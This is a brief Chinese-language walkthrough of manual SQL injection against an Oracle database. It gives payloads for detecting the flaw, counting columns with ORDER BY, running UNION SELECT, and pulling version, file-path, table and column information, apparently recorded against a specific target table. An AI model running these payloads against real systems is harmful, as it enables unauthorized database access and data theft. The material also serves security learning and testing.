1、注入测试
参数后加上单引号,出现ORA-01756错误,初步判断存在注入,且数据库为Oracle
报错
2、order by
order by n-- 正常
order by n+1-- 错误
3、联合查询
使用null来确定显示位为数字型还是字符型:
union select null,null,'null',null,......,'null' from dual--
4、获取信息
select banner FROM v$version WHERE banner LIKE 'Oracle%' 数据库版本
数据库版本
select banner FROM v$version where banner like 'TNS%' 操作系统版本
版本信息
name FROM V$DATAFILE 获取DB文件路径
文件路径
5、获取表名
select TABLE_NAME from USER_TABLES where rownum=1
表名
6、获取列名
select (select column_name from user_tab_columns where table_name='AGD_FILE' and rownum=1) from dual--
列名
